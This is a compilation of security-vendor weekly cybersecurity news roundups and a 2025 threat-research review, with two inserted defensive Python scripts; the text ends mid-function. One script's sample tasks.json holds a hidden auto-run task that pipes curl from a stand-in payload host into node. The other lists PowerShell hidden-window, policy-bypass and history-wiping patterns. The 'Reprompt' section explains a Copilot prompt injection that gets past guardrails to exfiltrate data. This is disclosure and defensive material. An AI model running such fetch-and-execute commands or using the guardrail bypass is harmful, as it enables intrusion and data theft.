The Good, the Bad and the Ugly in Cybersecurity – Week 4

The Good | Authorities Expose RaaS Leaders, Prosecute Identity Hackers & Tighten EU Cybersecurity Rules

Law enforcement in Ukraine and Germany have moved to dismantle the Black Basta ransomware gang, confirming its leader and placing him on Europol and Interpol wanted lists. Identified as Oleg Evgenievich Nefedov, the Russian national is also known online as kurva, Washington, and S.Jimmi.

Police have also arrested two alleged Black Basta affiliates accused of breaching networks, cracking credentials, escalating privileges, and preparing ransomware attacks.

Investigators also link Nefedov to a secondary role associated with the now-defunct Conti syndicate, confirming Black Basta’s evolution into a major ransomware-as-a-service (RaaS) operation responsible for hundreds of extortion incidents since 2022.

Police raid residence of suspected affiliates (Source: cyberpolice.gov.ua)

In the United States, Nicholas Moore has pleaded guilty to breaching electronic filing systems tied to the Supreme Court of the United States, AmeriCorps, and the Department of Veterans Affairs. Prosecutors note that he repeatedly accessed the Supreme Court’s restricted system in 2023 using stolen credentials. He also breached AmeriCorps and veterans’ accounts, stealing and leaking sensitive personal and health data. Moore took to Instagram under the account @ihackedthegovernment to post screenshots of his victims’ information. He has since confessed to one count of computer fraud, punishable by one year in prison and a $100,000 fine.

New cybersecurity legislation proposed by the European Commission mandates removing high-risk suppliers from telecom networks and shoring up defenses against state-backed and criminal cyber threats targeting critical infrastructure. The plan builds on shortcomings in the EU’s voluntary 5G Security Toolbox, originally designed to limit members’ reliance on high-risk vendors. It also grants the Commission authority to coordinate EU-wide risk assessments across 18 critical sectors, strengthens ICT supply chain security, and streamlines voluntary certification schemes to improve resilience and technological sovereignty.

The Bad | Contagious Interview Attackers Leverage Visual Studio Code to Deploy Backdoors

DPRK-linked threat actors behind the ongoing Contagious Interview campaign are evolving their tactics by using malicious Microsoft Visual Studio Code projects to deliver backdoors.

In new research, the attackers are seen masquerading as recruiters conducting job assessments, instructing targets to clone repositories from platforms like GitHub and open them in VS Code. Once opened, specially crafted task configuration files automatically execute, fetching obfuscated JavaScript payloads hosted on Vercel domains and deploying multi-stage malware.

After the user grants trust in VS Code, its tasks.json file can automatically run embedded commands (Source: Jamf)

This novel technique, first seen last month, leverages VS Code’s runOn: folderOpen feature to trigger execution whenever a project is accessed. Earlier variants delivered the BeaverTail and InvisibleFerret implants, while newer versions disguise droppers as benign spell-check dictionaries to achieve remote code execution.

As part of the final payload, the backdoor logic establishes a continuous execution loop to harvest basic host information and fingerprints systems before executing attacker-supplied code. In some cases, additional scripts are downloaded minutes later to beacon frequently to a remote server, run further commands, and erase traces of activity. Researchers note that parts of the malware may be AI-assisted due to its code structure and inline comments.

Targets are typically software engineers, especially those working in the cryptocurrency, blockchain, and fintech sectors, where access to source code, credentials, and digital assets is valuable. Parallel research shows similar abuse of VS Code tasks to deploy backdoors, cryptominers, and credential-stealing modules via multiple fallback methods.

DPRK-based threat actors are rapidly experimenting with various delivery methods to increase the success of their attacks. Developers can counter the threat by continuing to scrutinize third-party repositories, carefully reviewing task configurations, and installing only trusted dependencies.
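One way to review task configurations before opening a cloned repository, as an added example that is not code from this article or from the cited research: the script parses every .vscode/tasks.json under a directory and reports tasks set to run on folder open. The runOptions.runOn, presentation.reveal and windows/osx/linux keys are part of VS Code's task schema; the sample repository, its URL and the network heuristic are constructed assumptions.

```python
import json
import re
import tempfile
from pathlib import Path

# Heuristic for "reaches out to the network" (an assumption; tune locally).
NETWORK_HINT = re.compile(r"https?://|\b(?:curl|wget|Invoke-WebRequest)\b", re.I)
_STR = r'"(?:\\.|[^"\\])*"'  # a JSON string literal, escapes included

# Constructed sample: one ordinary task and one that auto-runs on folder open.
SAMPLE_TASKS = r'''{
  // tasks.json allows comments and trailing commas
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    { "label": "spellcheck", "type": "shell",
      "command": "curl -s https://payload.example.invalid/dict.js | node",
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" },
    },
  ]
}'''


def strip_jsonc(text):
    """Drop // and /* */ comments, then trailing commas; strings stay intact."""
    keep_strings = lambda m: m.group(0) if m.group(0).startswith('"') else ""
    text = re.sub(_STR + r"|//[^\n]*|/\*.*?\*/", keep_strings, text, flags=re.S)
    return re.sub(_STR + r"|,(?=\s*[}\]])", keep_strings, text, flags=re.S)


def _dict(value):
    return value if isinstance(value, dict) else {}


def _commands(task):
    """Command lines for a task, including windows/osx/linux overrides."""
    lines = []
    for scope in (task, *(_dict(task.get(k)) for k in ("windows", "osx", "linux"))):
        if scope.get("command"):
            args = scope.get("args")
            args = args if isinstance(args, list) else []
            args = [a.get("value", "") if isinstance(a, dict) else a for a in args]
            lines.append(" ".join(str(p) for p in [scope["command"], *args]))
    return lines


def auto_run_tasks(text):
    """Tasks VS Code starts by itself when a trusted folder is opened."""
    doc = _dict(json.loads(strip_jsonc(text)))
    findings = []
    for task in doc.get("tasks") or []:
        task = _dict(task)
        if _dict(task.get("runOptions")).get("runOn") != "folderOpen":
            continue
        cmds = _commands(task)
        findings.append({
            "label": task.get("label", "<unlabelled>"),
            "commands": cmds,
            # reveal never/silent keeps the terminal panel out of view
            "hidden": _dict(task.get("presentation")).get("reveal") in ("never", "silent"),
            "network": any(NETWORK_HINT.search(c) for c in cmds),
        })
    return findings


def scan_repo(root):
    """Check every .vscode/tasks.json under root before opening it in VS Code."""
    results = []
    for path in sorted(Path(root).rglob("tasks.json")):
        if path.parent.name != ".vscode":
            continue
        rel = path.relative_to(root).as_posix()
        try:
            hits = auto_run_tasks(path.read_text(encoding="utf-8", errors="replace"))
        except json.JSONDecodeError as exc:  # unparsable config: review by hand
            hits = [{"label": "<unparsable>", "error": str(exc)}]
        results += [{"file": rel, **hit} for hit in hits]
    return results


def demo():
    """Write the constructed sample into a throwaway repo and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        vscode = Path(tmp, "take-home-test", ".vscode")
        vscode.mkdir(parents=True)
        (vscode / "tasks.json").write_text(SAMPLE_TASKS, encoding="utf-8")
        return scan_repo(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it against a fresh clone from a terminal, before the folder is opened or trusted in the editor; any hit with "hidden" or "network" set deserves a manual read of the command.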

The Ugly | Attackers Target Misconfigured Training Apps to Access Cloud Environments

Threat actors are targeting misconfigured web applications like DVWA and OWASP Juice Shop to infiltrate cloud environments of Fortune 500 companies and their security vendors.

These intentionally vulnerable apps, designed for security training and internal testing, are exposed publicly and tied to privileged cloud accounts, creating a perfect storm of risks advantageous to attackers. Researchers have found nearly 2000 live, exposed apps, many linked to overly permissive identity access management (IAM) roles on AWS, GCP, and Azure, often using default credentials.

Attackers are leveraging the apps to deploy crypto miners, webshells, and persistence mechanisms. About 20% of found DVWA instances contain malicious artifacts, including XMRig cryptocurrency miners and a self-restoring watchdog.sh script that downloads additional AES-256-encrypted tools and removes competing miners.

PHP webshells like filemanager.php are also being deployed, allowing file operations and command execution, sometimes with indicators hinting at the operators’ origin.

XMRig mining Monero to xmr[.]kryptex[.]network resulting in the attacker keeping 100% of the proceeds (Source: Pentera)

These exposed credentials could provide attackers full access to S3 buckets, GCS, and Azure Blob Storage, meaning attackers have read and write permissions to Secrets Manager, can interact with container registries, and obtain admin cloud privileges.

With these attacks active in the wild, organizations are urged to take steps to minimize their risk profile. Key defenses include maintaining a resource inventory, isolating test environments, and enforcing least-privilege IAM roles. By also replacing default credentials and automating resource expiration, organizations can eliminate systemic blind spots in non-production systems.

The Good, the Bad and the Ugly in Cybersecurity – Week 3

The Good | Authorities Arrest 34 in Black Axe Cyber Fraud Crackdown

Spanish police have arrested 34 suspects tied to a cyber fraud network allegedly linked to the Black Axe group, following a joint operation with Europol. After raids across four cities, authorities seized €66,400 in cash, vehicles, devices, and froze €119,350 held in bank accounts.

Investigators say the Nigeria-led ring ran man-in-the-middle (MitM) and business email compromise (BEC) scams, causing over $6 million in losses total. So far, four suspected leaders of the network have been jailed pre-trial as the probe continues into Europe-wide money mule networks.

In other news this week, the latest iteration of BreachForums has suffered another data breach after a MyBB users database was leaked online. This occurred after a site named after the ShinyHunters extortion gang released a 7Zip archive exposing over 323,000 user records and the forum’s PGP private key. While most IP addresses mapped to local loopback values, more than 70,000 resolved to public addresses valuable to cybersecurity researchers and law enforcement.

In Amsterdam, the nation’s Court of Appeal has sentenced a Dutch national to seven years for computer hacking and attempted extortion with evidence stemming from Sky ECC, an end-to-end encrypted chat service that Europol dismantled in 2021. Though one cocaine import charge was dropped, judges upheld the convictions tied to hacking port logistics systems in Rotterdam, Barendrecht, and Antwerp.

The individual was found using malware-laced USB sticks, which then enabled covert drug imports, data theft, and malware re-sale between 2020 and 2021.

The Bad | Researchers Expose ‘Reprompt’ Attack That Could Hijack Microsoft Copilot Sessions

Security researchers have disclosed a novel attack technique dubbed ‘Reprompt’ that could enable attackers to silently hijack a user’s Microsoft Copilot session and exfiltrate sensitive data with a single click. The method abuses how Copilot processes URL parameters, enabling malicious prompts to be injected directly through a legitimate Copilot link.

Reprompt works by embedding hidden instructions in the “q” parameter of a Copilot URL. Should a victim click the link, Copilot automatically executes the malicious prompt within the user’s authenticated session. That session remains active even after the Copilot tab is closed, meaning attackers could continue issuing follow-up commands without further user interaction. Since no plugins, malware, or visible prompts are required, the activity is effectively invisible.

To bypass Copilot’s safeguards, the researchers combined three techniques: parameter-to-prompt (P2) injection, a double-request trick that exploits guardrails applying only to the initial request, and a chain-request model where Copilot dynamically fetches new instructions from an attacker-controlled server.

Combined, these techniques could enable continuous, stealthy data exfiltration, while client-side, legacy security tools would be unable to determine what information was being stolen.

Double request to bypass safeguards (Source: Varonis)

Reprompt only impacts Copilot Personal; those using Microsoft 365 Copilot are not impacted due to additional controls such as auditing, DLP, and administrative restrictions. Varonis disclosed the issue to Microsoft on August 31, 2025 and the vulnerability was addressed in this month’s Patch Tuesday. Currently, there are no reports of in-the-wild exploitation.

The findings, however, are indicative of the risks posed by LLMs and AI assistants. They underscore the need for security teams to understand the attack surface these tools present as their use in enterprise environments continues to proliferate.

The Ugly | Charity-Themed ‘PluggyApe’ Malware Targets Ukrainian Defense Forces

Ukraine’s CERT-UA has reported a charity-themed cyber espionage campaign targeting officials within the country’s Defense Forces between October and December 2025. The activity is attributed with medium confidence to a Russian-aligned threat group tracked as Laundry Bear (aka Void Blizzard or UAC‑0190), a cluster previously linked to the 2024 breach of Dutch police systems.

These attacks have been observed relying heavily on tailored social engineering tactics delivered via Signal and WhatsApp. Targets receive instant messages, often from compromised or spoofed Ukrainian phone numbers, directing them to fake charity websites where they are urged to download password-protected archives.

These archives contain malicious executables disguised as documents, including PIF files built with PyInstaller, which ultimately deploy a Python-based backdoor called ‘PluggyApe’. Once installed, PluggyApe profiles the infected system, assigns a unique victim identifier, and establishes persistence through Windows Registry changes. The malware supports remote command execution and data exfiltration, communicating over WebSocket or MQTT.

Examples of malicious lures (Source: CERT-UA)

Later versions of PluggyApe, observed from December 2025 onward, introduced stronger obfuscation, additional anti-analysis checks, and more resilient command-and-control (C2) mechanisms. Instead of hardcoding C2 infrastructure, the malware dynamically retrieves server addresses from public paste services such as rentry[.]co and pastebin[.]com, encoded in Base64, allowing operators to rapidly rotate infrastructure.

CERT-UA emphasized that mobile devices and messaging platforms have become primary attack vectors due to weaker monitoring and widespread trust. Compounding this is the attackers’ demonstrated knowledge of their targets and use of the Ukrainian language, audio, and video communication to increase credibility.

Alongside this campaign, CERT-UA also reports additional activity from other threat clusters targeting Ukrainian defense forces, local governments, and educational institutions using phishing, stealer malware, and open-source backdoors – all pointing to sustained and evolving cyber pressure facing Ukraine’s public sector.

The Good, the Bad and the Ugly in Cybersecurity – Week 2

The Good | U.K. Government Resets Public-Sector Cybersecurity With £210M Action Plan

The United Kingdom has unveiled a sweeping reset of its public-sector cybersecurity strategy, committing more than £210 million ($283 million) to shore up defenses across government departments and essential services. This investment is part of the new Government Cyber Action Plan, which marks a clear departure from years of fragmented oversight and outdated, legacy technology.

The new Government Cyber Action Plan sets a clear path to strengthen cyber security and boost resilience across the public sector.

Read more below⬇ https://t.co/HCswSOGuhP

— NCSC UK (@NCSC) January 6, 2026

The core of the plan is a centralized Government Cyber Unit, tasked with coordinating risk management, setting mandatory security standards, and leading incident response. Digital Government Minister Ian Murray framed the shift as urgent, warning that cyberattacks can take critical public services offline within minutes. Recent incidents like ransomware-driven NHS disruptions and the compromise of Ministry of Defence payroll systems all show that these risks are recurring realities rather than theoretical threats.

The action plan introduces stricter accountability for senior leaders, enhanced visibility into cyber risks, and more robust, centrally coordinated incident response exercises. Strategic government suppliers will also face tougher contractual cybersecurity requirements as concerns over supply chain vulnerabilities grow.

In tandem with the plan, the government is advancing the Cyber Security and Resilience Bill, which builds on the 2018 Network and Information System (NIS) Regulations. Separately, public bodies and critical infrastructure operators are set to be banned from paying ransomware demands, while telecom providers have pledged to curb phone-number spoofing.

While challenges still remain, this new strategy signals a long-overdue cultural and structural shift. If matched with sustained investment and accountability, it could finally place the U.K. public sector on a more resilient and security-first footing in the face of accelerating cyber threats.

The Bad | China-Linked UAT-7290 Expands Linux-Based Espionage Beyond South Asian Telcos

UAT-7290, a China-linked threat actor, has expanded its cyber espionage operations beyond its focus on South Asian telecommunications firms to include organizations across Southeastern Europe. Active since at least 2022, the group is known for its extensive reconnaissance, network penetration techniques, and heavy reliance on Linux-based malware to compromise public-facing infrastructure.

Cyber researchers assess that UAT-7290 conducts extensive technical profiling of targets before exploiting exposed edge network devices. The actor primarily leverages one-day exploits and targeted SSH brute force attacks, often relying on publicly available proof of concept (PoC) exploit code rather than developing their own. Once initial access is achieved, the group escalates privileges and deploys a modular malware ecosystem tailored for persistence and lateral movement.

UAT-7290’s core tooling centers on Linux implants, beginning with the RushDrop (ChronosRAT) initial dropper, which initiates the infection chain and deploys additional components such as DriveSwitch and the SilentRaid (MystRodX) backdoor. SilentRaid enables long-term access through a plugin-based architecture that supports remote shell access, port forwarding, file operations, and credential-related data collection. While Linux remains the primary focus, the group has occasionally deployed Windows malware – tools commonly shared among China-aligned threat actors.

UAT-7290 is also known for playing a secondary role as an initial access provider. It converts compromised devices into Operational Relay Boxes (ORBs), infrastructure that can later be reused by other Chinese espionage groups, using the Bulbature backdoor.

The tooling and infrastructure overlap with clusters such as APT10 and Moshen Dragon, reinforcing assessments that UAT-7290 is both an espionage operator and a strategic enabler within the broader Chinese cyber ecosystem.

The Ugly | Researchers Reveal Critical n8n Vulnerabilities Enabling Remote Code Execution

A series of critical vulnerabilities were recently disclosed in the open-source workflow automation platform n8n, allowing unauthenticated attackers to achieve remote code execution (RCE), perform arbitrary commands, and execute untrusted code leading to full compromise.

The first, CVE-2025-68668, dubbed ‘N8scape’, is a critical flaw (CVSS 9.9) involving a sandbox bypass in the Python Code Node using Pyodide. It affects n8n versions prior to 2.0.0 and allows users with workflow permissions to execute arbitrary OS commands with the same privileges as the n8n service. Version 2.0.0 addresses the issue by making a task runner-based native Python implementation, which improves security isolation, the default.

Shortly afterward, n8n disclosed an even more severe issue tracked as CVE-2026-21877, a CVSS 10.0 vulnerability enabling authenticated remote code execution under certain conditions. Affecting both self-hosted and n8n cloud deployments, the flaw could allow untrusted code execution, eventually leading to compromise of the entire instance. Although the critical flaw is patched in version 1.121.3, administrators are advised to apply the updates quickly, especially given a growing pattern of critical RCE-class vulnerabilities in the platform.

The third and latest disclosure this week, codenamed ‘Ni8mare’ and tracked as CVE-2026-21858 (CVSS 10.0), is a critical flaw that allows complete takeover of affected instances. Exploiting a content-type confusion issue in n8n’s webhook and form handling, attackers can read arbitrary files, extract credentials and encryption keys, forge admin sessions, and ultimately achieve RCE. Researchers noted that a compromised n8n instance becomes a single point of failure due to centralized storage of API keys, OAuth tokens, and infrastructure credentials, making it a veritable data trove for threat actors.

Invoking the content-type-confusion bug (Source: Cyera)

At the time of writing, attack surface management vendors report over 26,000 exposed n8n instances online, emphasizing the need for timely patching, controlled exposure, and strict access management.

12 Months of Fighting Cybercrime & Defending Enterprises | The SentinelLABS 2025 Review

Over the past twelve months, SentinelLABS research revealed how threat actors have changed their operational approach in ways previously unseen. Among our many research publications during 2025, we exposed North Korean threat actors monitoring the same cyber threat intelligence platforms defenders use to share indicators of compromise, and revealed how a single cryptocurrency phishing operation deployed over 38,000 malicious subdomains across trusted free-tier platforms.

2025 also saw artificial intelligence transition from theoretical threat to practical reality, though not in the revolutionary ways many predicted. Instead, AI emerged as a force multiplier, with threat actors weaponizing large language models to scale attacks, generate convincing social engineering content, and automate previously manual processes.

These discoveries, and others we will explore in this review, exemplify how adversaries have fundamentally changed their operational calculus, treating legitimate infrastructure—from Telegram to free-tier publishing platforms to commercial AI APIs—as essential criminal resources and actively surveilling the defender community’s intelligence-sharing mechanisms.

Throughout 2025, SentinelLABS tracked, identified, and disclosed information on these and other critical issues to help organizations and defenders stay ahead of threats to their business operations.

All our research and threat intelligence posts can be found on the SentinelLABS home page, but for a recap of the year’s main cybersecurity events, take a scroll through the main highlights below.

Key Trends from SentinelLABS Research in 2025

  • AI Weaponization Across the Threat Spectrum: Artificial intelligence matured from a theoretical threat to an operational accelerator, used to automate existing capabilities from runtime code generation (MalTerminal) to CAPTCHA bypassing (AkiraBot), lowering barriers for both sophisticated and commodity attacks.
  • Threat Actors Monitoring Defensive Intelligence: North Korean operators (Contagious Interview) began actively monitoring platforms like Validin and VirusTotal to detect their own infrastructure exposure in near real-time.
  • Industrial-Scale Cryptocurrency & Credentials Theft: Highly organized, business-like criminal operations such as FreeDrain and PXA Stealer prove cryptocurrency and credential theft at scale has evolved into a professional sector with sophisticated infrastructure and monetization pipelines.
  • Exploitation of Legitimate Platforms: Threat actors have increasingly leveraged trusted infrastructure for malicious purposes: Telegram for C2 and data monetization, free-tier publishing platforms for phishing campaigns, and cloud services for hosting and evasion.
  • China’s Hidden Offensive Capabilities: Research into Hafnium-linked companies and firms that provide Censorship as a Service to government customers reveals deep integration between China’s private cybersecurity sector and state offensive operations.
  • Developments in Social Engineering: Through ClickFix techniques, fake CAPTCHA pages, and increasingly convincing fake job offers, threat actors have found new ways to exploit user psychology to deliver malware.

January

SentinelLABS researchers uncovered how HellCat and Morpheus ransomware operations were essentially two distinct brands deploying identical ransomware payloads, illustrating the commoditization and rebranding practices within the RaaS ecosystem. This discovery highlighted how affiliates could rebrand the same underlying malware to create the appearance of distinct threat groups, complicating attribution efforts.

Our research into a returning phishing campaign revealed the targeting of high-profile accounts on X (formerly Twitter) to promote cryptocurrency scams. The attacks demonstrated the persistent value of compromising social media accounts with large followings for financially motivated threat actors seeking to reach broad audiences with investment fraud schemes.

Key Takeaway: Understanding how common code is sourced and shared across ransomware groups can inform detection efforts and improve threat intelligence on their operations.

February

In early February, SentinelLABS reported on further variants of the FlexibleFerret DPRK malware family, continuing the Contagious Interview campaign that had been active since November 2023. The research uncovered new infection vectors and samples while also documenting persistent attempts to compromise developers through fake GitHub issues promoting malicious installer scripts.

Later in the month, analysis of leaked data from TopSec, a Beijing-based cybersecurity firm, revealed how China’s private sector provides Censorship as a Service to enforce government content monitoring. The leaked work logs showed TopSec delivering bespoke monitoring services to a state-owned enterprise precisely when a corruption investigation was announced, offering rare insight into public-private coordination for managing sensitive events and controlling public opinion in China.

February concluded with discovery of a new Ghostwriter campaign targeting both the Ukrainian government and, for the first time, Belarusian opposition groups. The long-running threat activity cluster deployed weaponized Excel documents with lures crafted to appeal to government officials and opposition activists, marking an expansion of the campaign’s targeting scope.

Key Takeaway: The TopSec leak reveals how China’s private cybersecurity sector directly enables state surveillance and censorship operations, highlighting the interconnected nature of commercial security firms and government offensive capabilities.

March

March was marked by several significant ransomware developments. Mid-month, SentinelLABS reported on Dragon RaaS, a pro-Russian hacktivist group attempting to build on the reputation of “The Five Families” cybercrime ecosystem. The group’s emergence reflected the continued fragmentation and rebranding within ransomware operations.

The month also saw publication of research on ReaderUpdate, a macOS malware loader that had been largely dormant since 2023. New samples showed the threat actors had expanded the loader’s capabilities by adding Go to its existing arsenal of Crystal, Nim, and Rust variants, creating a “melting pot” of macOS malware designed to evade detection through diverse implementation languages.

Key Takeaway: ReaderUpdate’s use of multiple programming languages (Crystal, Nim, Rust, Go) presents unique challenges for detection and analysis, necessitating detection strategies that focus on behavior and artifacts rather than language-specific signatures.

April

April brought the discovery of AkiraBot, an AI-powered Python framework using OpenAI to generate custom spam messages targeting website contact forms and chat widgets.

Since September 2024, the bot had targeted more than 400,000 websites and successfully spammed at least 80,000 sites promoting dubious SEO services. The framework’s sophistication, including multiple CAPTCHA bypass mechanisms and network detection evasion techniques, illustrated how AI lowers barriers for scaled attacks even when the underlying criminal objective remains straightforward.

Later in the month, SentinelLABS published research on what it takes to defend a top-tier cybersecurity company from today’s adversaries. Drawing on SentinelOne’s own experiences as a target of advanced persistent threats, the research provided insight into the resources and capabilities required to protect organizations that themselves represent high-value targets for nation-state actors seeking to compromise security vendors.

Key Takeaway: AI-generated content in AkiraBot bypasses traditional spam filters by creating unique messages for each target, exposing the challenges AI poses to traditional website spam defenses.

May

May opened with our reporting on DragonForce, a ransomware gang that had completed its transformation from Pro-Palestine hacktivist operation to profit-driven extortion enterprise. The group introduced a “white-label” branding service in early 2025, allowing affiliates to rebrand DragonForce ransomware as different strains for additional fees, marking a new level of commercialization within the RaaS ecosystem.

Shortly afterward, SentinelLABS and Validin unveiled FreeDrain at PIVOTcon. Our collaboration exposed an industrial-scale cryptocurrency phishing operation using SEO manipulation and over 38,000 distinct subdomains across free publishing platforms. The investigation began with a victim who lost approximately $500,000 worth of Bitcoin and expanded to reveal a professional criminal enterprise operating during standard business hours from the UTC+05:30 timezone, systematically stealing digital assets through multilayered redirection techniques.

Anti-Ransomware Day 2025 marked the sobering milestone of ten years of Ransomware-as-a-Service, now a billion-dollar criminal industry. SentinelLABS’ retrospective examined how RaaS operations had evolved from early experiments into sophisticated criminal enterprises with mature business models, customer service, and ongoing innovation.

A busy month for our researchers concluded with documentation of ClickFix techniques embedding fraudulent CAPTCHA images on compromised websites. We shared original findings from SentinelOne investigations, including infection chains and technical artifacts not previously reported.

Key Takeaway: FreeDrain’s abuse of thousands of subdomains on trusted free-tier platforms demonstrates that without stronger default safeguards, identity verification, or proper abuse response infrastructure, free publishing platforms will continue to be abused, undermining user trust and inflicting real-world financial harm.

June

SentinelLABS expanded on its earlier research on adversaries targeting top-tier organizations, detailing a China-nexus threat actor’s reconnaissance operation against SentinelOne itself that had occurred in October 2024 and extended into 2025. The research highlighted adversaries’ persistent focus on compromising cybersecurity vendors and high-value targets.

Also in June, we reported on Katz Stealer, an emerging Malware-as-a-Service platform targeting credentials and crypto assets. Advertised on BreachForums in April 2025, Katz Stealer followed the established RaaS business model, offering services to affiliates for upfront fees and demonstrating the continued commercialization of information stealer operations.

We reported on two separate Mac-focused campaigns in June, attributed in turn to China and North Korean threat actors. Our researchers found evidence of macOS.ZuRu’s re-emergence with a modified Khepri C2 framework concealed inside a trojanized version of the legitimate Termius SSH client. We also detailed intrusions attributed to DPRK activity and the macOS NimDoor malware family: a Nim-based backdoor specifically designed to target Web3 and crypto platforms. The research extended understanding of North Korean threat actors’ evolving macOS malware playbook and their persistent focus on the cryptocurrency sector.

Key Takeaway: DPRK’s exploration of lesser-known languages in order to introduce analysis complexity requires security engineers to invest equal effort in understanding the affordances such languages offer threat actors.

July

One of the year’s most significant zero-day disclosures was revealed when Microsoft confirmed active exploitation of SharePoint ToolShell (CVE-2025-53770) on July 19th, two days after SentinelOne first observed ToolShell exploitation. SentinelLABS researchers subsequently documented targeted exploitation against high-value organizations in technology consulting, manufacturing, critical infrastructure, and professional services.

The vulnerability enabled unauthenticated remote code execution through crafted POST requests, with attacks occurring before public disclosure spurred mass exploitation. Further research found multiple state-aligned threat actors beginning reconnaissance and early-stage exploitation activities.

Later in July, following Department of Justice indictments of two hackers working for China’s Ministry of State Security, SentinelLABS identified more than ten patents for highly intrusive forensics and data collection technologies registered by companies linked to the Hafnium (Silk Typhoon) threat actor group.

The patents revealed previously unreported offensive capabilities including encrypted endpoint data acquisition, mobile forensics, and network traffic collection, exposing the sophisticated technical infrastructure supporting China’s APT operations and highlighting critical gaps in traditional campaign-focused attribution.

Key Takeaway: Campaign-focused attribution misses the full picture. Understanding the companies behind attacks and their documented capabilities, not just observed behavior, is essential for comprehensive threat intelligence.

August

In early August, SentinelLABS and Beazley Security exposed the PXA Stealer campaign, a Python-based operation that had infected more than 4,000 unique victims across 62 countries. The stolen data included over 200,000 passwords, hundreds of credit card records, and more than 4 million browser cookies, and was monetized through a Vietnamese-speaking cybercriminal ecosystem using Telegram APIs. The campaign demonstrated increasingly advanced tradecraft with nuanced anti-analysis techniques, non-malicious decoy content, and hardened command-and-control infrastructure.

This month, SentinelLABS also exposed widespread smart contract scams, where actors advertised crypto trading bots concealing malicious contracts designed to drain user wallets. Promoted through fake YouTube channels and AI-generated videos, the scams demonstrated how threat actors leverage social media and emerging technologies to lend legitimacy to financial fraud schemes.

Key Takeaway: Stealer campaigns have become increasingly automated and supply-chain integrated. PXA Stealer exemplifies a growing trend in which legitimate infrastructure is weaponized at scale.

September

SentinelLABS, in collaboration with Validin, exposed how North Korean threat actors behind the Contagious Interview campaign were actively monitoring cyber threat intelligence platforms to detect infrastructure exposure.

The research revealed coordinated teams using Slack for real-time collaboration and rapidly deploying replacement infrastructure when services took down their assets. Between January and March 2025 alone, our efforts identified more than 230 victims, predominantly cryptocurrency professionals, with the actual number likely significantly higher.

Later in September, SentinelLABS published groundbreaking research on hunting for LLM-enabled malware. Facing the challenge that malware offloading functionality to AI could generate unique code at runtime and evade traditional detection, our researchers developed novel methodologies based on embedded API key detection and specific prompt structure patterns.

This approach successfully identified previously unknown samples including MalTerminal, potentially the earliest known example of LLM-enabled malware. Despite initial concerns about detection challenges, the research showed how defenders could reliably hunt for and detect these emerging threats.

Key Takeaway: LLM-enabled malware is still in a nascent stage, giving defenders an opportunity to learn from attackers’ mistakes and adjust their approaches accordingly.

October

In late October, following intelligence shared by the Digital Security Lab of Ukraine, SentinelLABS investigated PhantomCaptcha, a coordinated single-day spearphishing operation launched on October 8th targeting organizations critical to Ukraine’s war relief efforts.

The threat actors used emails impersonating the Ukrainian President’s Office carrying weaponized PDFs, luring victims into executing malware via a ‘ClickFix’-style fake Cloudflare captcha page. The final payload was a multi-stage WebSocket RAT, hosted on Russian-owned infrastructure, with an array of offensive features including arbitrary remote command execution, data exfiltration, and the potential deployment of additional malware.

The campaign reflects a highly capable adversary with extensive operational planning, compartmentalized infrastructure, and deliberate exposure control. The six-month period between initial infrastructure registration and attack execution, followed by the swift takedown of user-facing domains while maintaining backend command-and-control, indicates an operator well-versed in both offensive tradecraft and defensive detection evasion.

Key Takeaway: User awareness training on “ClickFix”-style social engineering techniques can help prevent attacks using this infection vector. PowerShell logging provides visibility into commands using hidden window styles, execution policy bypasses, or attempts to disable command history logging, while network security teams can monitor for WebSocket connections to recently-registered or suspicious domains.
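The three PowerShell behaviours named in this takeaway, written as detection logic over log records. This is an added example, not SentinelLABS code: the JSON record schema, host names and sample lines are constructed, and the rule names are hypothetical.

```python
import json
import re

# Constructed sample records, not taken from any real incident. The JSON schema
# is an assumption; 4688 = process creation, 4104 = PowerShell script block.
SAMPLE_LOG = r'''
{"host": "ws-014", "event_id": 4688, "text": "powershell.exe -NoP -w hidden -ep bypass -File C:\\Users\\Public\\update.ps1"}
{"host": "ws-014", "event_id": 4104, "text": "Set-PSReadLineOption -HistorySaveStyle SaveNothing"}
{"host": "ws-022", "event_id": 4688, "text": "ping.exe -n 1 -w 1 10.0.0.5"}
{"host": "ws-031", "event_id": 4688, "text": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ExecutionPolicy RemoteSigned -File C:\\ops\\backup.ps1"}
{"host": "ws-031", "event_id": 4104, "text": "Remove-Item (Get-PSReadLineOption).HistorySavePath"}
{"host": "ws-040", "event_id": 4688, "text": "cmd.exe /c start /min PowerShell -WindowStyle Hidden -Command Get-Date"}
'''

PS_HOSTS = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}
TOKEN_RE = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')

# Attempts to stop PSReadLine from keeping command history, or to delete it.
HISTORY_RE = re.compile(
    r"HistorySaveStyle\s+['\"]?SaveNothing"
    r"|\b(?:Remove-Item|rm|del|ri)\b[^|;\n]*HistorySavePath",
    re.IGNORECASE,
)
# Policy changed from inside a script rather than on the command line.
SET_POLICY_RE = re.compile(r"Set-ExecutionPolicy\b[^|;\n]*\bBypass\b", re.IGNORECASE)


def _tokens(text):
    """Split a command line on whitespace, keeping quoted strings together."""
    return [t.strip("\"'") for t in TOKEN_RE.findall(text)]


def _is_param(token, full_name, min_len, aliases=()):
    """True if token is '-<prefix of full_name>'; PowerShell accepts
    abbreviated parameter names, so -w and -WindowStyle are the same switch."""
    if not token.startswith("-"):
        return False
    name = token[1:].lower()
    if name in aliases:
        return True
    return len(name) >= min_len and full_name.startswith(name)


def flag_text(text):
    """Return the set of rule names that the command line or script text trips."""
    hits = set()
    toks = _tokens(text)
    for i, tok in enumerate(toks):
        # Only look at switches that follow a PowerShell host binary, so that
        # "ping -w 1" is not mistaken for a hidden window.
        if re.split(r"[\\/]", tok)[-1].lower() not in PS_HOSTS:
            continue
        args = toks[i + 1:]
        for param, value in zip(args, args[1:]):
            v = value.lower()
            if _is_param(param, "windowstyle", 1) and v in ("hidden", "1"):
                hits.add("hidden_window")
            # "-e" alone means EncodedCommand, so require at least "-ex".
            if _is_param(param, "executionpolicy", 2, aliases=("ep",)) and v == "bypass":
                hits.add("policy_bypass")
    if SET_POLICY_RE.search(text):
        hits.add("policy_bypass")
    if HISTORY_RE.search(text):
        hits.add("history_disabled")
    return hits


def scan(log_text):
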